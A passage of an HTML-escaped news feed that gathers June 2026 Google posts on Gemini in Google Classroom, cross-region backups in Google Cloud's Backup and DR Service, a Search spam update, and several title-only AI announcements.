concept&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Teachers can also personalize three new starter prompts to generate a slide deck for a given concept and grade level using Gemini’s Canvas tool:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create a presentation&lt;/li&gt;&lt;li&gt;Create an interactive activity&lt;/li&gt;&lt;li&gt;Convert a file to Google slides&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXdbvdkkpDDa8PQoInhl-3-dh6wS5IPbLiNXxV5chyS2ZRvSvg_C4hSV0Atj7_JXFDxNQ7NpwdlSA2TvU6tx0k8ZupIIizM5KO_epnEGoc96WQ4WyvfJPLG14jGoahFXo3quF9PSzz4nTlVZ75SRe-14b4MPhsoHPgo0EoxZ-Yj2gTlxkrj44fI_zaBI/s3984/Updates%20to%20Gemini%20in%20Google%20Classroom.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXdbvdkkpDDa8PQoInhl-3-dh6wS5IPbLiNXxV5chyS2ZRvSvg_C4hSV0Atj7_JXFDxNQ7NpwdlSA2TvU6tx0k8ZupIIizM5KO_epnEGoc96WQ4WyvfJPLG14jGoahFXo3quF9PSzz4nTlVZ75SRe-14b4MPhsoHPgo0EoxZ-Yj2gTlxkrj44fI_zaBI/s16000/Updates%20to%20Gemini%20in%20Google%20Classroom.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; As an administrator of your organization's Google Accounts, you can control who is allowed to use Gemini in Google Classroom to generate content and resources. These capabilities are only available to users who are &lt;a href="https://support.google.com/edu/classroom/answer/6071551?hl=en&amp;amp;ref_topic=11987113&amp;amp;sjid=5080632148063304179-NC#zippy=" target="_blank"&gt;verified as teachers&lt;/a&gt; and as 18 years of age or older in your institution’s &lt;a href="https://support.google.com/a/answer/10651918" target="_blank"&gt;age-based access settings&lt;/a&gt;. Visit the Help Center to learn about &lt;a href="http://support.google.com/a/answer/16291887" target="_blank"&gt;managing access to Gemini in Classroom and the option to turn the service on or off for users in your Admin console&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Navigate to the Gemini tab in the navigation bar in Google Classroom. When using generated content, you should always review the outputs as AI can make mistakes and refine the output so that it fits your context and local policies before assigning to students. Visit the Help Center to learn more about &lt;a href="https://support.google.com/edu/classroom/answer/15410566" target="_blank"&gt;Gemini in Classroom&lt;/a&gt;, and check out these &lt;a href="https://docs.google.com/presentation/d/1MTyP-BBusYw2rHKE_lQ2QVDA7uT7ngYaGfBy9HypQdY/edit?slide=id.g39a340b9584_1285_8915#slide=id.g39a340b9584_1285_8915" target="_blank"&gt;resources for teachers, including this resource with tips and best practices for trying Gemini in Classroom&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Fundamentals, Standard, and Plus&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="http://support.google.com/a/answer/16291887" target="_blank"&gt;Manage access to Gemini in Classroom&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Classroom Help: &lt;a href="https://support.google.com/edu/classroom/answer/15410566" target="_blank"&gt;Learn about Gemini in Classroom&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-24T20:48:48+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html</id>
    <title>Updates to Gemini in Google Classroom</title>
    <updated>2026-06-24T20:48:48+00:00</updated>
    <content type="html">We are introducing several updates to the Gemini tab in Google Classroom designed to make its tools even more helpful for teachers. These changes make it easier for educators to collaborate with AI and create visual aids from any device, while expanding options for refining lesson plans.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Mobile availability&lt;/b&gt;&lt;/div&gt;&lt;div&gt;We know educators and students use Google Classroom on the go on their mobile devices, so we are excited to announce that the Gemini tab is now available in the Classroom Android and iOS apps, making these features more accessible to teachers and higher education students. For educators, the following features are available in the Classroom mobile app: Generate a quiz, Brainstorm project ideas, Craft a compelling hook, Tackle common misconceptions, and starter prompts for the Gemini app. All Gemini starter prompts and personal class notebooks in the student Gemini tab are available in the Classroom mobile app.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Tools to generate visual resources&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Powered by Nano Banana 2, Google’s newest image generation model, these starter prompts help teachers create visuals that illustrate complex topics for students:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create an infographic&lt;/li&gt;&lt;li&gt;Draw a comic strip&lt;/li&gt;&lt;li&gt;Visualize a concept&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Teachers can also personalize three new starter prompts to generate a slide deck for a given concept and grade level using Gemini’s Canvas tool:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Create a presentation&lt;/li&gt;&lt;li&gt;Create an interactive activity&lt;/li&gt;&lt;li&gt;Convert a file to Google slides&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXdbvdkkpDDa8PQoInhl-3-dh6wS5IPbLiNXxV5chyS2ZRvSvg_C4hSV0Atj7_JXFDxNQ7NpwdlSA2TvU6tx0k8ZupIIizM5KO_epnEGoc96WQ4WyvfJPLG14jGoahFXo3quF9PSzz4nTlVZ75SRe-14b4MPhsoHPgo0EoxZ-Yj2gTlxkrj44fI_zaBI/s3984/Updates%20to%20Gemini%20in%20Google%20Classroom.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXdbvdkkpDDa8PQoInhl-3-dh6wS5IPbLiNXxV5chyS2ZRvSvg_C4hSV0Atj7_JXFDxNQ7NpwdlSA2TvU6tx0k8ZupIIizM5KO_epnEGoc96WQ4WyvfJPLG14jGoahFXo3quF9PSzz4nTlVZ75SRe-14b4MPhsoHPgo0EoxZ-Yj2gTlxkrj44fI_zaBI/s16000/Updates%20to%20Gemini%20in%20Google%20Classroom.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; As an administrator of your organization's Google Accounts, you can control who is allowed to use Gemini in Google Classroom to generate content and resources. These capabilities are only available to users who are &lt;a href="https://support.google.com/edu/classroom/answer/6071551?hl=en&amp;amp;ref_topic=11987113&amp;amp;sjid=5080632148063304179-NC#zippy=" target="_blank"&gt;verified as teachers&lt;/a&gt; and as 18 years of age or older in your institution’s &lt;a href="https://support.google.com/a/answer/10651918" target="_blank"&gt;age-based access settings&lt;/a&gt;. Visit the Help Center to learn about &lt;a href="http://support.google.com/a/answer/16291887" target="_blank"&gt;managing access to Gemini in Classroom and the option to turn the service on or off for users in your Admin console&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Navigate to the Gemini tab in the navigation bar in Google Classroom. When using generated content, you should always review the outputs as AI can make mistakes and refine the output so that it fits your context and local policies before assigning to students. Visit the Help Center to learn more about &lt;a href="https://support.google.com/edu/classroom/answer/15410566" target="_blank"&gt;Gemini in Classroom&lt;/a&gt;, and check out these &lt;a href="https://docs.google.com/presentation/d/1MTyP-BBusYw2rHKE_lQ2QVDA7uT7ngYaGfBy9HypQdY/edit?slide=id.g39a340b9584_1285_8915#slide=id.g39a340b9584_1285_8915" target="_blank"&gt;resources for teachers, including this resource with tips and best practices for trying Gemini in Classroom&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Fundamentals, Standard, and Plus&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="http://support.google.com/a/answer/16291887" target="_blank"&gt;Manage access to Gemini in Classroom&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Classroom Help: &lt;a href="https://support.google.com/edu/classroom/answer/15410566" target="_blank"&gt;Learn about Gemini in Classroom&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-24T20:48:48+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/storage-data-transfer/backup-and-dr-service-adds-cross-region-backups</id>
    <title>Enhanced data resilience with cross-region backups in Backup and DR Service</title>
    <updated>2026-06-24T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To maintain business continuity, you need a robust data-backup strategy. While multi-region backups offer the highest availability, many organizations want a more cost-effective way to protect their data against a regional outage, but still adhere to data residency requirements.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on our foundation of&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/backup-vaults-add-support-for-disk-backup-and-multi-region"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-region backup protection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we are excited to announce the general availability (GA) of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;cross-region backups &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;for our &lt;/span&gt;&lt;a href="https://cloud.google.com/backup-disaster-recovery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Backup and DR Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. With this update, your backup destination is no longer tethered to your source&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;: The backup regions can be entirely distinct from the region where the primary workload is located.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This decoupling is essential for protecting against localized regional outages while maintaining granular control over where your data lives. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This capability is now fully available for Compute Engine instances, Disks and Filestore, with support for Cloud SQL and AlloyDB to follow.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why cross-region backups?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While multi-region backups provide near-zero downtime, they can carry higher infrastructure costs that you don’t always need for every application. Cross-region backups bridge this gap by offering:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimizing costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Selectively designate recovery regions, offering a granular alternative to standard multi-region deployments while enabling control and maximizing value.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Simplifying compliance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Navigate complex data residency laws (like GDPR) by choosing exactly which geopolitical boundary your backup should reside in.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Improving regional resilience:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Protect against localized disasters by placing a restorable copy of your data in a completely different geographical region.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Here’s how it works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We designed implementing a cross-region backup strategy to be intuitive and integrated into your existing workflows:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create a backup vault:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set up a backup vault in a region different from your source resource.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Configure the backup plan:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a backup plan in the resource's region but select the vault located in the secondary region.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_4ERVGNz.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Attach and automate:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Attach the plan to your resource. Backup and DR handles the rest, moving your data directly to a regional backup vault, outside of the source region.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In short, cross-region backups deliver the resilience and cost-efficiency organizations need without compromising on complex compliance and data residency standards. By allowing direct backups to secondary regions, you get a robust layer of protection against localized disasters, with more &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;autonomy to select secondary locations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; compared to the pre-defined boundaries of multi-region deployments. We encourage you to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/backupdr/backup-plans/create"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;explore these new capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and experience how Backup and DR can enhance your data resilience strategy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Resources&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/backup-disaster-recovery/docs/concepts/backup-vault"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Create a Backup Vault that supports cross-region backups&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/backup-disaster-recovery/pricing?e=0#inter-region-data-transfer-charge"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Billing for cross-region backups&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/storage-data-transfer/backup-and-dr-service-adds-cross-region-backups" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-24T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/storage-data-transfer/backup-and-dr-service-adds-cross-region-backups/</id>
    <title>Enhanced data resilience with cross-region backups in Backup and DR Service</title>
    <updated>2026-06-24T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To maintain business continuity, you need a robust data-backup strategy. While multi-region backups offer the highest availability, many organizations want a more cost-effective way to protect their data against a regional outage, but still adhere to data residency requirements.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on our foundation of&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/backup-vaults-add-support-for-disk-backup-and-multi-region"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-region backup protection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we are excited to announce the general availability (GA) of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;cross-region backups &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;for our &lt;/span&gt;&lt;a href="https://cloud.google.com/backup-disaster-recovery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Backup and DR Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. With this update, your backup destination is no longer tethered to your source&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;: The backup regions can be entirely distinct from the region where the primary workload is located.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This decoupling is essential for protecting against localized regional outages while maintaining granular control over where your data lives. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This capability is now fully available for Compute Engine instances, Disks and Filestore, with support for Cloud SQL and AlloyDB to follow.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why cross-region backups?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While multi-region backups provide near-zero downtime, they can carry higher infrastructure costs that you don’t always need for every application. Cross-region backups bridge this gap by offering:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimizing costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Selectively designate recovery regions, offering a granular alternative to standard multi-region deployments while enabling control and maximizing value.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Simplifying compliance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Navigate complex data residency laws (like GDPR) by choosing exactly which geopolitical boundary your backup should reside in.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Improving regional resilience:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Protect against localized disasters by placing a restorable copy of your data in a completely different geographical region.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Here’s how it works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We designed implementing a cross-region backup strategy to be intuitive and integrated into your existing workflows:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create a backup vault:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set up a backup vault in a region different from your source resource.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Configure the backup plan:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a backup plan in the resource's region but select the vault located in the secondary region.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_4ERVGNz.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Attach and automate:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Attach the plan to your resource. Backup and DR handles the rest, moving your data directly to a regional backup vault, outside of the source region.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In short, cross-region backups deliver the resilience and cost-efficiency organizations need without compromising on complex compliance and data residency standards. By allowing direct backups to secondary regions, you get a robust layer of protection against localized disasters, with more &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;autonomy to select secondary locations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; compared to the pre-defined boundaries of multi-region deployments. We encourage you to &lt;/span&gt;&lt;a href="https://console.cloud.google.com/backupdr/backup-plans/create"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;explore these new capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and experience how Backup and DR can enhance your data resilience strategy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Resources&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/backup-disaster-recovery/docs/concepts/backup-vault"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Create a Backup Vault that supports cross-region backups&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/backup-disaster-recovery/pricing?e=0#inter-region-data-transfer-charge"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Billing for cross-region backups&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/storage-data-transfer/backup-and-dr-service-adds-cross-region-backups/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-24T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/thinking-to-recall-how-reasoning-unlocks-parametric-knowledge-in-llms</id>
    <title>Thinking to recall: How reasoning unlocks parametric knowledge in LLMs</title>
    <updated>2026-06-24T16:51:52+00:00</updated>
    <content type="html">Generative AI</content>
    <link href="https://research.google/blog/thinking-to-recall-how-reasoning-unlocks-parametric-knowledge-in-llms" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-24T16:51:52+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/thinking-to-recall-how-reasoning-unlocks-parametric-knowledge-in-llms/</id>
    <title>Thinking to recall: How reasoning unlocks parametric knowledge in LLMs</title>
    <updated>2026-06-24T16:51:52+00:00</updated>
    <content type="html">Generative AI</content>
    <link href="https://research.google/blog/thinking-to-recall-how-reasoning-unlocks-parametric-knowledge-in-llms/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-24T16:51:52+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/introducing-computer-use-in-gemini-3-5-flash</id>
    <title>Introducing computer use in Gemini 3.5 Flash</title>
    <updated>2026-06-24T16:30:01+00:00</updated>
    <link href="https://deepmind.google/blog/introducing-computer-use-in-gemini-3-5-flash" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-24T16:30:01+00:00</published>
  </entry>
  <entry>
    <id>https://status.search.google.com/incidents/YUX1peHev5a4fkxLDiUQ</id>
    <title>UPDATE: June 2026 spam update</title>
    <updated>2026-06-24T16:03:11+00:00</updated>
    <content type="html">&lt;p&gt; Incident began at &lt;strong&gt;2026-06-24 09:00&lt;/strong&gt; &lt;span&gt;(all times are &lt;strong&gt;US/Pacific&lt;/strong&gt;).&lt;/span&gt;&lt;/p&gt;&lt;div class="cBIRi14aVDP__status-update-text"&gt;&lt;p&gt;Released the June 2026 &lt;a href="https://developers.google.com/search/docs/appearance/spam-updates"&gt;spam update&lt;/a&gt;, which applies globally and to all languages. The rollout may take a few days to complete.&lt;/p&gt;
&lt;/div&gt;&lt;hr /&gt;&lt;p&gt;Affected products: Ranking&lt;/p&gt;</content>
    <link href="https://status.search.google.com/incidents/YUX1peHev5a4fkxLDiUQ" rel="alternate"/>
    <category term="Search Status Dashboard"/>
    <published>2026-06-24T16:03:11+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/gemini-models/introducing-computer-use-gemini-3-5-flash</id>
    <title>Introducing computer use in Gemini 3.5 Flash</title>
    <updated>2026-06-24T16:00:00+00:00</updated>
    <content type="html">Gemini 3.5 logo on a blue background</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/introducing-computer-use-gemini-3-5-flash" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-24T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/gemini-models/introducing-computer-use-gemini-3-5-flash/</id>
    <title>Introducing computer use in Gemini 3.5 Flash</title>
    <updated>2026-06-24T16:00:00+00:00</updated>
    <content type="html">Gemini 3.5 logo on a blue background</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/introducing-computer-use-gemini-3-5-flash/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-24T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/play-expanded-billing.html</id>
    <title>Expanded billing choice and lower fees on Google Play</title>
    <updated>2026-06-24T14:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUB5FJxvJIARbdD14jKJu4Jg0uzjczgDxybt5NlviqF_vL91B0GzqNHTcURyCT1nUJgc22LmhvXBk_E2UOXvLqXN_dZfs0YrlbMrl3ZJ_CYcn4W4qoTUhU5k0Y8DhoXltMRMUGQN7uzj6pH4qV1dtRCR6tAKpjmH3Ys_94xqHgR6SfHMpAplFgz8ClGG8/s8533/Apps%20Experience_Play%20Blog%20MetadataCard__2048x1323.jpg" style="display: none;" /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Posted by Paul Feng, Vice President, Google Play Eng, Product, UX&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

